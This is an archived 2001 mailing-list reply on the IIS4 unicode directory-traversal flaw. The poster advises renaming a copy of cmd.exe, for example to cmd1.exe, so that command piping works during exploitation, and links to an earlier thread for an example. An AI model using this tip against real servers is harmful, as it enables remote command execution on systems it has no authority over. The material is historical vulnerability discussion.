Vulnerability Development mailing list archives

Re: unicode / iis4 (fwd)

From: Julian Linton <jlinton () CIS FAMU EDU>
Date: Sat, 6 Jan 2001 19:16:42 -0500

you must first to another copy cmd.exe to another name such as cmd1.exe, if
you use cmd.exe it will not allow piping but simply rename it and u got a
winner.
http://www.securityfocus.com/templates/archive.pike?threads=0&end=2000-10-29
&mid=141284&start=2000-10-23&list=1&fromthread=0&
give you an example